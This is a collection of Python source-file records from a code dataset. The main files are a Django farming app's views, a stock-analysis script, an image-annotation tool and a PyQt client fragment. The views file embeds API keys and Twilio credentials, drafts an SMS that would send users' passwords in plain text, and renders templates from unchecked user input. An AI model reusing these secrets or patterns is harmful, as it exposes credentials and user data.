str(list_of_data['weather'][0]['icon']),\n }\n print(data)\n if data['condition']==\"overcast clouds\":\n pass\n print('\\n'+city,' user '+str(i['user'])+' overcast condition',end='\\n')\n\n\n# printit()\ndef index(request):\n return render(request, 'accounts/basic.html')\n\ndef Farmer(request):\n return render(request, 'accounts/FarmerPage.html')\n\ndef home(request):\n return render(request, 'accounts/basic.html')\ndef Admin(request):\n return render(request, 'accounts/AdminPage.html')\n\n\ndef userpage(request):\n return render(request, 'accounts/index.html')\n\ndef handlelogin(request):\n if request.method == \"POST\":\n uname1 = request.POST['uname1']\n pass3 = request.POST['pass3']\n user = auth.authenticate(username=uname1, password=pass3)\n if user is not None:\n auth.login(request, user)\n datas = extendeduser.objects.filter(user=request.user)\n messages.success(request, \"Successfully logged in\")\n if request.user.is_superuser:\n return redirect(\"admin\")\n data = str(datas[0].cat)\n if data == \"Farmer\":\n return redirect('farmer')\n #return render(request,'accounts/FarmerPage.html')\n elif data == \"Admin\":\n return redirect('admin')\n #return render(request, 'accounts/AdminPage.html')\n else:\n messages.error(request, \"Invalid Credentials\")\n return render(request, 'accounts/basic.html')\n else:\n return HttpResponse('NOT allowed')\n\ndef Addschemes(request):\n return render(request, 'accounts/AddSchemes.html')\n\ndef weather(request):\n try:\n if request.method == 'POST':\n city = request.POST['city']\n if len(city) == 0:\n messages.error(request, \"Enter city name\")\n return render(request, 'accounts/weather.html')\n src = 'http://api.openweathermap.org/data/2.5/weather?appid=e995a3bb90b825a2202b9786e17caa56&q='\n url = src + city\n list_of_data = requests.get(url).json()\n temp = list_of_data['main']['temp']\n newtmp = round(temp - 273.15, 3)\n condition = list_of_data['weather'][0]['description']\n humidity = list_of_data['main']['humidity']\n data = {\n \"city\": city,\n \"temp\": newtmp,\n \"humidity\": humidity,\n \"condition\": condition,\n \"icon\": str(list_of_data['weather'][0]['icon']),\n }\n return render(request, 'accounts/weather.html', data)\n except:\n messages.error(request, \"Write city name correctly\")\n return render(request, 'accounts/weather.html')\ndef handlelogout(request):\n logout(request)\n messages.success(request, \"Successfully logged out\")\n return render(request, 'accounts/basic.html')\n\ndef adminpanel(request):\n if request.method == 'POST':\n info = str(request.POST['dos'])\n name = str(request.POST['tos'])\n l = LoanSchemeForFarmers()\n l.info = info\n l.scheme_name = name\n l.save()\n euser=extendeduser.objects.values('phone','user')\n q=[]\n for j in euser:\n q.append(j['phone'])\n\n # url = \"https://www.fast2sms.com/dev/bulk\"\n # querystring = {\"authorization\": \"ycJbOn8xXkgUB5j9ZTpM2hDHrYvFt4IzsNlSmAfLeaoGPiEKR7jiZe3wOzktNoFS8Ahr6TgQqvyPW9LV\", \"Kissan-Mithra\", \"message\": info+\"Scheme updated on Kissan Mithra\",\n # \"language\": \"english\", \"route\": \"p\", \"numbers\":q}\n # headers = {\n # 'cache-control': \"no-cache\"\n # }\n # response = requests.request(\"GET\", url, headers=headers, params=querystring)\n # print(response.text)\n\n #zerosms.sms(phno=9689914109, passwd=password, message='helloworld!!', receivernum=receiver mobilenumber)\n # #SMS Notification\n # if p=='8830502656':\n # account_sid = 'ACa522720e1d991ba02ac1afec621f3ed4'\n # auth_token = 'f284dae9dfc1886dfe099fb75b0908a7'\n # client = Client(account_sid, auth_token)\n #\n # message = client.messages.create(\n # body=l.scheme_name+\" Scheme Info: \"+l.info,\n # from_='+12183166674',\n # to='+918830502656'\n # )\n #\n # print(message.sid)\n\n return render(request, 'accounts/AdminPanel.html')\n@login_required(login_url='/basic/')\ndef signup(request):\n try:\n #if request.method == 'POST':\n uname = request.POST['uname']\n email = request.POST['email']\n fname = request.POST['fname']\n lname = request.POST['lname']\n phone = request.POST['phone']\n cat = request.POST['cat']\n town=request.POST['town']\n pass1 = request.POST['pass1']\n pass2 = request.POST['pass2']\n if len(uname)<6:\n messages.error(request, \"Week Username\")\n return render(request, 'accounts/basic.html')\n if pass1!=pass2:\n messages.error(request, \"Passwords not Same\")\n return render(request, 'accounts/basic.html')\n if len(pass1)<6:\n messages.error(request, \"Password must be greater than 6 characters\")\n return render(request, 'accounts/basic.html')\n user = User.objects.create_user(uname, email, pass1)\n user.first_name = fname\n user.last_name = lname\n user.save()\n newuser = extendeduser(phone=phone, cat=cat,town=town, user=user)\n newuser.save()\n messages.success(request, \"Your KissanMithra Account has been Created Successfully\")\n euser = extendeduser.objects.values('phone', 'user')\n #url=\"https://www.fast2sms.com/dev/bulkV2\"\n #querystring = {\n # \"authorization\": \"2q6jELcGXbfUtkxZaWDVMOs89YghdiHyuRm1lInz0Sw3KpBQT5ncm4yFvCsPZBugbAfe2tz0rhG7iOSa\",\n # \"sender_id\": \"Kissan-Mithra\", \"message\": \"your Kissan-Mithra has been created successfully\\n Your Username is \"+uname+\"\\nPassword is \"+pass1+\"\\n If you have any query call on below Number \\nCustomerCare No:7560941330\",\n # \"language\": \"english\", \"route\": \"p\", \"numbers\": phone}\n # headers = {\n # 'cache-control': \"no-cache\"\n # }\n # response = requests.request(\"GET\", url, headers=headers, params=querystring)\n # print(response.text)\n return render(request, 'accounts/basic.html')\n except:\n messages.error(request, \"User with this information already exists\")\n return render(request, 'accounts/basic.html')\ndef addcrop(request):\n if request.method == 'POST':\n cropinfo = str(request.POST['cropinfo'])\n cropname = str(request.POST['cropname'])\n cropimg = str(request.POST['cropimg'])\n c = CropInfo()\n c.crop_name = cropname\n c.crop_info = cropinfo\n c.img='accounts/images/'+cropimg\n c.save()\n return render(request, 'accounts/AdminPanel.html')\n\ndef getPrediction(district,c_season):\n x = approvals()\n x = x.predict(district, c_season)\n return x\ndef get_data():\n crops = CropInfo.objects.values('crop_name', 'crop_info')\n return crops\n\n\nclass my_dictionary(dict):\n\n # __init__ function\n def __init__(self):\n self = dict()\n\n # Function to add key:value\n\n def add(self, key, value):\n self[key] = value\n\ndef govtschemes(request):\n l=LoanSchemeForFarmers.objects.values('scheme_name','info')\n lis=[]\n for i in l:\n lis.append(i)\n dic={'dic':lis}\n print(dic)\n return render(request,'accounts/govschemes.html',dic)\n\ndef addPest(request):\n if request.method=='POST':\n pest=request.POST.get('pest')\n district=request.POST.get('district')\n crop=request.POST.get('crop')\n\n source = urllib.request.urlopen(\n 'http://api.openweathermap.org/data/2.5/weather?q=' + district + '&appid=f90ba0f6ad9de2b73ce56962af45f62e').read()\n\n list_of_data = json.loads(source)\n temp=round(list_of_data['main']['temp']-273.15)\n rain=897\n humidity=(list_of_data['main']['humidity'])\n windspeed=(list_of_data['wind']['speed'])\n c=PestControl()\n c.AddPest(district,temp,rain,humidity,windspeed,crop,pest)\n return render(request, 'accounts/addpest.html')\ndef predictPest(request):\n data={}\n if request.method=='POST':\n district = request.POST.get('district')\n crop = request.POST.get('crop')\n crop=crop.capitalize()\n\n p = PestControl()\n source = urllib.request.urlopen(\n 'http://api.openweathermap.org/data/2.5/weather?q=' + district + '&appid=f90ba0f6ad9de2b73ce56962af45f62e').read()\n\n list_of_data = json.loads(source)\n temp = round(list_of_data['main']['temp'] - 273.15)\n rain = 897\n humidity = (list_of_data['main']['humidity'])\n wind = (list_of_data['wind']['speed'])\n\n x = p.PredictPest(crop, district, temp, rain, humidity, wind)\n data['data']=x\n return render(request, 'accounts/predictpest.html',data)\n\ndef viewcrop(request):\n if request.method=='POST':\n data=''\n val=request.POST.get('crop-name')\n print(val)\n crop=CropInfo.objects.values('crop_name', 'crop_info','img')\n return render(request,'accounts/'+val+'.html')\n # for i in crop:\n # if i['crop_name']==val:\n # data=i['crop_info']\n # data={'data':i}\n # return render(request, 'accounts/viewcrop.html',data)\n else:\n return HttpResponse('NO CROP SELECTED')\n\ndef predictMPG(request):\n\n if request.method=='GET':\n context={'zz':1}\n if request.method == 'POST':\n w=WillPlant.objects.values('user','crop','town')\n temp3 = {}\n temp3['District'] = request.POST.get('District4')\n temp3['District'] = temp3['District'].upper()\n district=temp3['District']\n p = PestControl()\n source = urllib.request.urlopen(\n 'http://api.openweathermap.org/data/2.5/weather?q=' + district + '&appid=f90ba0f6ad9de2b73ce56962af45f62e').read()\n\n list_of_data = json.loads(source)\n temp = round(list_of_data['main']['temp'] - 273.15)\n rain = 897\n humidity = (list_of_data['main']['humidity'])\n wind = (list_of_data['wind']['speed'])\n temp3['Season'] = (request.POST.get('Season1'))\n\n c_season = int(temp3['Season'])\n season = ''\n\n x = getPrediction(district, c_season)\n # if c_season == 0:\n # season = \"Current Season\"\n crops = CropInfo.objects.values('crop_name', 'crop_info', 'img')\n crop_found = []\n pest_found = {}\n pest = []\n croppest = {}\n list_planted_crop=[]\n for i in w:\n if i['town']==district:\n list_planted_crop.append(i['crop'])\n print(list_planted_crop)\n if c_season == 1:\n season = 'Kharif'\n elif c_season == 2:\n season = 'Rabbi'\n elif c_season == 3:\n season = 'Whole Year'\n elif c_season == 4:\n season = 'No specific season'\n elif c_season == 5:\n season='All Seasons Without Previous Year Prod'\n for i in x[0]:\n for j in crops:\n z = i\n if j['crop_name'] == z:\n count_of_crop = list_planted_crop.count(z)\n j['count'] = count_of_crop\n if count_of_crop > 1:\n j['danger'] = 1\n else:\n j['safe']=1\n t = p.PredictPest(z, district, temp, rain, humidity, wind)\n n = len(crops)\n pest.append(t)\n pest_found[z] = t\n crop_found.append(j)\n croppest[z] = t\n\n context = {'crop': x[0], 'district': temp3['District'], 'season': season, 'predicted_crops': x[0],\n 'found': crop_found, 'pest': pest_found, 'croppest': croppest}\n return render(request, 'accounts/predict.html', context)\n\n for i in range(0,len(x[1])):\n for j in crops:\n z=(x[1][i][0])\n if j['crop_name']==z:\n count_of_crop=list_planted_crop.count(z)\n j['count']=count_of_crop\n if count_of_crop>1:\n j['danger']=1\n else:\n j['safe']=1\n print(z,count_of_crop)\n t = p.PredictPest(z, district, temp, rain, humidity, wind)\n n = len(crops)\n pest.append(t)\n pest_found[z]=t\n crop_found.append(j)\n croppest[z]=t\n\n context = {'crop': x[1],'district':temp3['District'],'season':season,'predicted_crops':x[0],'found':crop_found,'pest':pest_found,'croppest':croppest}\n # context={}\n return render(request, 'accounts/predict.html', context)\n\ndef getPredictionNoPrevious(district,c_season):\n x = approvals()\n x = x.predict(district, c_season)\n return x\n\ndef predictwithoutprevious(request):\n context={}\n return render(request, 'accounts/predict.html', context)\n\n\ndef showweather(request):\n return render(request, 'accounts/weather.html')\n\n\ndef marketforuser(request):\n m_prices=MarketPrices.objects.values('town','crop','market','date','price')\n lis=[]\n for i in m_prices:\n print(i)\n lis.append(i)\n dic={'prices':lis}\n return render(request,'accounts/marketforuser.html',dic)\n\ndef willplant(request):\n if request.method=='POST':\n flg=0\n crop=request.POST.get('crop-name')\n dis=request.POST.get('district')\n # w=willplant()\n print(crop,dis,request.user)\n # w.user=reques t.user\n # w.town=''\n # w.crop=crop\n will_plant=WillPlant.objects.values('user','crop','town')\n\n for i in will_plant:\n print(i['user'],i['crop'],i['town'],request.user,crop,dis)\n if str(i['user'])==str(request.user) and str(i['crop']) == str(crop) and str(i['town']) == str(dis):\n flg=1\n if flg==0 or len(will_plant)==0:\n w = WillPlant()\n w.user = str(request.user)\n w.town = str(dis)\n w.crop = str(crop)\n w.save()\n print('added successfully')\n else:\n print('failed')\n print(will_plant)\n return render(request,'accounts/FarmerPage.html')\n\ndef userinfo(request):\n userdata=[]\n urs=extendeduser.objects.values('phone','cat','town','user')\n for i in urs:\n userdata.append(i)\n userdata={'userdata':userdata}\n return render(request,'accounts/userinfo.html',userdata)\n\ndef cropcountadminview(request):\n will_plant = WillPlant.objects.values('user', 'crop', 'town')\n lis=[]\n for i in will_plant:\n lis.append(i)\n croplist=[]\n for i in lis:\n croplist.append(i['crop'])\n croplist = list(set(croplist))\n citylist=[]\n for i in lis:\n croplist.append(i['crop'])\n citylist = list(set(citylist))\n lis2=[]\n cnt=0\n dic2={}\n # for i in range(0,len(croplist)):\n # for j in range(1,len(lis)):\n # if lis[j]['crop']==croplist[i] and lis[j]['town']==citylist[i]:\n # dic2[croplist[j]]=croplist[i]\n # print(dic2)\n lis=sorted(lis, key=lambda i: i['town'])\n # lis=sorted(lis,key=lambda i: i['crop'])\n dic={'dic':lis}\n # print(dic)\n return render(request,'accounts/cropcountadminview.html',dic)\n\ndef adminmarketadd(request):\n print(request.user)\n z={'z':1}\n if request.method=='POST':\n dis = request.POST.get('District4')\n crop=request.POST.get('crop')\n market=request.POST.get('market')\n price=request.POST.get('price')\n date=datetime.datetime.now()\n print(dis,crop,market,date)\n marketprice=MarketPrices.objects.values('town','market','crop','price','date')\n for i in marketprice:\n if i['town']==dis and crop==i['crop'] and market==i['market']:\n i['price']=price\n item=MarketPrices.objects.get(town=dis,market=market,crop=crop)\n print(item)\n item.delete()\n marketpricenew=MarketPrices()\n marketpricenew.town=dis\n marketpricenew.market=market\n marketpricenew.crop=crop\n marketpricenew.price=price\n marketpricenew.date=date\n marketpricenew.save()\n\n return render(request,'accounts/adminmarketadd.html',z)\n\ndef schemepmkisan(request):\n if request.method=='POST':\n name=request.POST.get('schemename')\n print(name)\n return render(request,'accounts/'+name+'.html')\n\ndef pestinformation(request):\n return render(request,'accounts/pestinformation.html')\ndef LeafSpot(request):\n return render(request,'accounts/Leaf Spot or Sigatoka.html')\ndef PanamaWilt(request):\n return render(request,'accounts/Panama Wilt.html')\ndef AmricanBollWarm(request):\n return render(request, 'accounts/Amrican Boll Warm.html')\ndef PinkBollWarm(request):\n return render(request, 'accounts/Pink Boll Warm.html')\ndef Leafhopper(request):\n return render(request, 'accounts/Leaf hopper.html')\ndef Cornworm(request):\n return render(request, 'accounts/Corn worm.html')\ndef PotatoLateBlightPhytophthorainfestans(request):\n return render(request, 'accounts/Potato Late Blight Phytophthora infestans.html')\ndef Earlyshootborer(request):\n return render(request, 'accounts/Early shoot borer.html')\n","sub_path":"KissanMithra/KissanMithra/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":19444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"466833229","text":"# python 3.6 32bit\n# installed package\n# 1. mysql-connector-python\n# 2. sqlalchemy\n# 3. odo and [datapipelines, networkx 1.11, cassiopeia]\n# 4. pandas\n# 5. numpy\n# 6. matplotlib\n# 7. sklearn\n\nimport logging\nimport sys\nimport time\nimport smwjsql.query as qu\nimport pandas as pd\nimport numpy as np\nimport const.const as ic\nimport matplotlib.pyplot as plt\nfrom logging.handlers import TimedRotatingFileHandler\nfrom sqlalchemy import create_engine\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.model_selection import cross_val_score\n\n\ndef logger_start():\n logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n formatter = logging.Formatter('[%(levelname)s:%(lineno)s] %(asctime)s > %(message)s')\n logger = logging.getLogger()\n\n fh = TimedRotatingFileHandler(\"./analyze\", when=\"midnight\")\n fh.setFormatter(formatter)\n fh.suffix = \"_%Y%m%d.log\"\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setFormatter(formatter)\n\n logger.addHandler(fh)\n logger.addHandler(ch)\n logger.setLevel(logging.DEBUG)\n\n return logger\n\n\ndef orm_init():\n scott = ic.config[\"user\"]\n tiger = ic.config[\"password\"]\n host = ic.config[\"host\"]\n bind = 'mysql+mysqlconnector://' + scott + ':' + tiger + '@' + host + ':3306/smwj'\n\n # DBSession = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n # db_session = DBSession()\n\n return create_engine(bind)\n\n\ndef query(sql):\n result = pd.read_sql(sql, engine)\n\n return result\n\n\ndef add_label(df):\n result_df = pd.DataFrame(df['kospi_close'].shift(-1))\n result_df['org'] = df['kospi_close']\n result_df['max'] = result_df['kospi_close'][::-1].rolling(window=5, center=False).max()[::-1]\n result_df['max_rate'] = ((result_df['max'] / result_df['org'] - 1) * 100).round(2)\n result_df.loc[result_df['max_rate'] > 0.6, 'label'] = 1\n result_df['label'] = result_df['label'].fillna(0)\n\n return result_df\n\n\ndef add_plain_variable(df):\n result_df = df.copy()\n anal_temp = result_df.copy()\n days = [1, 5, 10, 20, 40, 60]\n for col in anal_temp.columns:\n for day in days:\n result_df[col + str(day)] = ((result_df[col] / result_df[col].shift(day) - 1) * 100).round(2)\n\n del anal_temp\n\n return result_df\n\n\ndef add_cumsum_variable(df):\n result_df = df.copy()\n anal_temp = result_df.copy()\n days = [2, 5, 10, 20, 40, 60]\n for col in anal_temp.columns:\n for day in days:\n result_df[col + str(day)] = result_df[col].rolling(day).sum()\n\n del anal_temp\n\n return result_df\n\n\n# some env setting\npd.set_option('display.max_columns', None)\n# pd.set_option('display.max_rows', None)\n\n# variable init\nlogger = logger_start()\nengine = orm_init()\ntoday = time.strftime(\"%Y%m%d\")\n\n# data load\n# df = kospi_data_load()\ndf = query(qu.magic)\n\n# data copy\nanal = df.copy()\n\n# data info\nanal.info()\nanal.describe()\nanal.hist(bins=50, figsize=(20, 15))\n# correlation of diff_rate\ncorr_mat = anal.corr()\ncorr_mat[\"diff_rate\"].sort_values(ascending=False)\n\n# data transform\n# 1. preparing label\nanal_tmp = add_label(anal)\nanal_label_train = anal_tmp['label'][81:981]\nanal_label_test = anal_tmp['label'][981:]\nanal_label_train.shape\nanal_label_test.shape\ndel anal_tmp\n# len(anal_tmp.loc[anal_tmp['label'] == 1]) # 10days: 499, 5days: 339, 3days: 238\n# anal_tmp.head(30)\n\n\n# 2 dropping useless column\nanal_plain_pp = anal.loc[:, ['volume', 'fx_close', 'mmf']]\nanal_cumsum_pp = anal.loc[:, ['kospi_fore', 'kospi_inst', 'futures_fore', 'futures_inst']]\n# anal_scaled.describe()\n# anal_scaled = anal_scaled.drop('label', axis=1)\n\n# 3. adding diff rate between present and 1, 5, 10, 20, 40, 60days ago\nanal_plain_pp = add_plain_variable(anal_plain_pp)\nanal_cumsum_pp = add_cumsum_variable(anal_cumsum_pp)\nanal_pp = anal_plain_pp.merge(anal_cumsum_pp, left_index=True, right_index=True)\nanal_pp_train = anal_pp[81:981]\nanal_pp_test = anal_pp[981:]\nanal_pp_train.head(10)\nanal_pp_train.shape\nanal_pp_test.shape\ndel anal_pp\n\n# 4. data scaling\n# stardardized scaling\nanal_pipeline = Pipeline([('std_scaler', StandardScaler())])\nanal_train = anal_pipeline.fit_transform(anal_pp_train)\nanal_test = anal_pipeline.fit_transform(anal_pp_test)\n# anal_train = pd.DataFrame(anal_ss, columns=anal_pp.columns)\n# anal_train.head(70)\n# anal_train.describe()\n\n# 5. Random Forest\nrf_clf = RandomForestClassifier()\nrf_clf.fit(anal_train, anal_label_train)\nrf_score = cross_val_score(rf_clf, anal_train, anal_label_train, scoring='neg_mean_squared_error', cv=10)\nrf_rmse_score = np.sqrt(-rf_score)\nrf_rmse_score\n\n# 6. preparing test data\npredict = rf_clf.predict(anal_test)\nresult = pd.DataFrame([predict, anal_label_test.values], columns=['pred', 'actual'])\nround(len(result.loc[result['actual'] == result['pred']]) / len(result) * 100, 2)\n\n# max drawdown\nadd = df.copy()\n\nwindow = 20\nroll_max = df[\"close\"].rolling(window, min_periods=1).max()\ndaily_drawdown = df[\"close\"] / roll_max - 1.0\nmax_daily_drawdown = daily_drawdown.rolling(window, min_periods=1).min()\n\ndaily_drawdown.plot()\nmax_daily_drawdown.plot()\nplt.xticks(add['tran_day'].values)\nplt.show()\n","sub_path":"analysis/kospi_eda.py","file_name":"kospi_eda.py","file_ext":"py","file_size_in_byte":5225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"77990236","text":"from django.db.models.signals import post_save, pre_save\nfrom .models import User\nfrom django.dispatch import receiver\nfrom django.template.loader import render_to_string\nfrom django.core.mail import EmailMultiAlternatives\nfrom rest_framework_simplejwt.tokens import RefreshToken\n\n\n@receiver(pre_save, sender=User)\ndef user_to_inactive(sender, instance, **kwargs):\n if instance._state.adding is True:\n instance.is_active = False\n\n\n@receiver(post_save, sender=User)\ndef email_verification(sender, instance, **kwargs):\n if kwargs['created']:\n user = instance\n\n merge_data = {\n 'user': user,\n 'protocol': \"http\",\n 'domain': '127.0.0.1:8000',\n 'token': RefreshToken.for_user(user=user).access_token\n }\n\n subject = render_to_string(\"email/email_verification/email_subject.txt\", merge_data).strip()\n html_body = render_to_string(\"email/email_verification/email_body.html\", merge_data)\n\n msg = EmailMultiAlternatives(subject=subject, to=[\"mbanach2@edu.cdv.pl\"])\n msg.attach_alternative(html_body, \"text/html\")\n msg.send()\n\n\npre_save.connect(user_to_inactive, sender=User)\npost_save.connect(email_verification, sender=User)\n\n","sub_path":"backend/shop_app/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"310171701","text":"import sys\n\ndef main():\n input = sys.stdin.readline\n sx, sy, tx, ty = map(int, input().rstrip().split())\n\n horiz = tx - sx\n vert = ty - sy\n\n first_move = \"U\"*vert + \"R\"*horiz + \"D\"*vert + \"L\"*horiz\n second_move_go = \"L\" + \"U\"*(vert+1) + \"R\"*(horiz+1) + \"D\"\n second_move_back = \"R\" + \"D\"*(vert+1)+ \"L\"*(horiz+1) + \"U\" \n print(first_move + second_move_go + second_move_back)\n\nif __name__ == \"__main__\":\n main()","sub_path":"Python_codes/p03836/s844258908.py","file_name":"s844258908.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"331972402","text":"import os\nimport sys\nimport cv2\nimport numpy as np\nimport xml.etree.ElementTree as ET\n\n\ndef exportXML(coords, label, img_dims, img_name, img_path, out_path):\n\n # create the file structure\n annotation = ET.Element('annotation')\n folder = ET.SubElement(annotation, 'folder')\n filename = ET.SubElement(annotation, 'filename')\n path = ET.SubElement(annotation, 'path')\n source = ET.SubElement(annotation, 'source')\n database = ET.SubElement(source, 'database')\n size = ET.SubElement(annotation, 'size')\n width = ET.SubElement(size, 'width')\n height = ET.SubElement(size, 'height')\n depth = ET.SubElement(size, 'depth')\n segmented = ET.SubElement(annotation, 'segmented')\n object = ET.SubElement(annotation, 'object')\n name = ET.SubElement(object, 'name')\n pose = ET.SubElement(object, 'pose')\n truncated = ET.SubElement(object, 'truncated')\n difficult = ET.SubElement(object, 'difficult')\n bndbox = ET.SubElement(object, 'bndbox')\n xmin = ET.SubElement(bndbox, 'xmin')\n ymin = ET.SubElement(bndbox, 'ymin')\n xmax = ET.SubElement(bndbox, 'xmax')\n ymax = ET.SubElement(bndbox, 'ymax')\n\n annotation.set('verified', 'yes')\n\n folder.text = \"images\"\n filename.text = img_name\n path.text = img_path\n database.text = \"CS497 Sign Language\"\n width.text = str(img_dims[0])\n height.text = str(img_dims[1])\n depth.text = str(img_dims[2])\n segmented.text = \"0\"\n name.text = label\n pose.text = \"Unspecified\"\n truncated.text = \"0\"\n difficult.text = \"0\"\n xmin.text = str(coords[0][0])\n ymin.text = str(coords[0][1])\n xmax.text = str(coords[1][0])\n ymax.text = str(coords[1][1])\n\n # create a new XML file with the results\n img_annot = ET.tostring(annotation)\n with open(out_path, 'wb') as f:\n f.write(img_annot)\n\n\ndef define_rect(image):\n \"\"\"\n Define a rectangular window by click and drag your mouse.\n\n Parameters\n ----------\n image: Input image.\n \"\"\"\n\n clone = image.copy()\n rect_pts = [] # Starting and ending points\n win_name = \"comp_frame\" # Window name\n\n def select_points(event, x, y, flags, param):\n\n nonlocal rect_pts\n if event == cv2.EVENT_LBUTTONDOWN:\n rect_pts = [(x, y)]\n\n if event == cv2.EVENT_LBUTTONUP:\n rect_pts.append((x, y))\n\n # draw a rectangle around the region of interest\n cv2.rectangle(clone, rect_pts[0], rect_pts[1], (255, 255, 255), 2)\n cv2.imshow(win_name, clone)\n\n cv2.namedWindow(win_name)\n cv2.setMouseCallback(win_name, select_points)\n\n while True:\n # display the image and wait for a keypress\n cv2.imshow(win_name, clone)\n key = cv2.waitKey(0) & 0xFF\n\n if key == ord(\"r\"): # Hit 'r' to replot the image\n clone = image.copy()\n\n elif key == ord(\" \"): # Hit 'c' to confirm the selection\n break\n elif key == ord(\"q\"):\n return None\n\n # close the open windows\n cv2.destroyWindow(win_name)\n\n return rect_pts\n\n\ndef draw_rect(frame, annotator_id, label):\n\n annot_dir_name = \"./annotations\"\n img_dir_name = \"./images\"\n os.listdir(annot_dir_name)\n\n coords = define_rect(frame)\n\n if coords is None:\n return None\n\n numImgs = len([f for f in os.listdir(img_dir_name) if f.endswith('.png')\n and os.path.isfile(os.path.join(img_dir_name, f))])\n id = \"{0:04d}\".format(numImgs + 1)\n\n img_dims = frame.shape\n img_name = f\"img_{annotator_id}_{id}.png\"\n\n img_path = os.path.join(img_dir_name, img_name)\n out_path = os.path.join(\n annot_dir_name, f\"annot_{annotator_id}_{id}.xml\")\n\n exportXML(coords, label, img_dims,\n img_name, img_path, out_path)\n\n cv2.imwrite(img_path, frame)\n\n\ndef main(video_file_name, annotator_id, label):\n cap = cv2.VideoCapture(video_file_name)\n img_comp = None\n img2comp_list = []\n back_frame = None\n front_frame = None\n count = 0\n auto_append = False\n auto_append_num = 0\n\n while True:\n ret, frame = cap.read()\n frame = cv2.resize(frame, (640, 480))\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n cv2.imshow(\"compress this?\", frame)\n\n if auto_append and count < auto_append_num:\n img2comp_list.append(frame)\n count += 1\n print(\"frame count:\", count, \"AUTO ADDED\")\n continue\n elif auto_append and count >= auto_append_num:\n auto_append = False\n\n key = cv2.waitKey() & 0xFF\n if key == ord(\"q\"):\n continue\n elif key == ord(\" \"):\n img2comp_list.append(frame)\n count += 1\n elif key == ord(\"d\"):\n back_frame = img2comp_list[0]\n comp_frame = np.zeros_like(back_frame, np.float32)\n diff = None\n \"\"\"\n for i_frame in img2comp_list:\n #diff = cv2.absdiff(i_frame, back_frame)\n diff = cv2.absdiff(back_frame, i_frame)\n cv2.accumulateWeighted(diff.astype(np.float32), comp_frame, 0.025)\n cv2.accumulateWeighted()\n cv2.imshow(\"diff\",diff)\n cv2.waitKey(0)\n \"\"\"\n print(\"compressing\", len(img2comp_list), \"frames\")\n for i in range(len(img2comp_list)-1):\n #diff = cv2.absdiff(i_frame, back_frame)\n diff = cv2.absdiff(img2comp_list[i+1], img2comp_list[i])\n cv2.accumulateWeighted(diff.astype(\n np.float32), comp_frame, 0.025)\n cv2.imshow(\"diff\", diff)\n cv2.waitKey(0)\n\n comp_frame = (comp_frame/comp_frame.max())*255\n comp_frame = comp_frame.astype(np.uint8)\n mean_val = cv2.mean(comp_frame)[0]\n\n #ret, comp_frame = cv2.threshold(comp_frame, int(mean_val/2), 255, cv2.THRESH_BINARY)\n comp_frame = cv2.cvtColor(comp_frame, cv2.COLOR_GRAY2BGR)\n cv2.imshow(\"comp_frame\", comp_frame)\n cv2.waitKey(0)\n draw_rect(comp_frame, annotator_id, label)\n elif key == ord(\"b\"):\n img2comp_list.pop()\n count -= 1\n elif key == ord(\"a\"):\n auto_append = True\n auto_append_num = int(input(\"How many frames to compress? : \"))\n print(auto_append_num, \"entered\")\n\n print(\"frame count:\", count)\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) != 4:\n print(\"Usage: python rec_vid.py video_file_name annotator_id label\")\n exit()\n\n video_file_name = sys.argv[1]\n annotator_id = sys.argv[2]\n label = sys.argv[3]\n main(video_file_name, annotator_id, label)\n","sub_path":"rec_vid.py","file_name":"rec_vid.py","file_ext":"py","file_size_in_byte":6697,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"264228653","text":"'''\r\nCreated on 10.03.2013\r\n\r\n@author: soeren\r\n'''\r\n\r\nfrom PyQt4.QtCore import QAbstractTableModel, QModelIndex, QVariant, pyqtSlot, Qt\r\nfrom PyQt4.QtGui import QMessageBox, QIcon, qApp, QInputDialog, QMovie, QImage\r\n\r\nfrom qt.ui.navigation_widget import NavigationPage\r\nimport client.settings as clientsettings\r\n \r\nfrom client.ui.navigation_pages_ui.Ui_MainMenuPage import Ui_MainMenuPage\r\nfrom client.ui.navigation_pages_ui.Ui_GamePage import Ui_GamePage\r\nfrom client.ui.navigation_pages_ui.Ui_SearchGamePage import Ui_SearchGamePage\r\nfrom client.ui.navigation_pages_ui.Ui_SettingsPage import Ui_SettingsPage\r\n \r\nfrom client.ui.settings_pages import ProfileSettingsPage\r\n\r\nfrom client.net.server_finder import PyDurakServerFinder\r\n\r\n \r\n \r\nclass GamePage(NavigationPage):\r\n '''\r\n GamePage\r\n '''\r\n\r\n def __init__(self, pageId, parent, isNetGame = False):\r\n '''\r\n Constructor\r\n '''\r\n super(GamePage, self).__init__(pageId, parent)\r\n \r\n self.__is_netgame = isNetGame\r\n \r\n self.ui = Ui_GamePage()\r\n self.ui.setupUi(self)\r\n \r\n def initContent(self):\r\n print(\"Init Gameplay\")\r\n gameName = QInputDialog.getText(self, \"Spielname\", \"Gib dem Spiel einen Name:\")\r\n print(gameName)\r\n if self.__is_netgame:\r\n pass\r\n\r\n def resetContent(self):\r\n print(\"Reset Gameplay\")\r\n self.ui.chatBrowser.setText(\"\")\r\n self.ui.chatInput.setText(\"\")\r\n\r\n\r\n\r\n\r\nclass GameListModel(QAbstractTableModel):\r\n '''\r\n An abstract table model to display game info objects.\r\n '''\r\n \r\n def __init__(self, parent=None):\r\n super(GameListModel, self).__init__(parent)\r\n \r\n self.__data = []\r\n \r\n def rowCount(self, parent):\r\n return len(self.__data)\r\n \r\n def columnCount(self, parent):\r\n return 2 # game name and address\r\n \r\n def data(self, index, role):\r\n if (not index.isValid()) or index.row() > len(self.__data):\r\n return None\r\n \r\n if role == 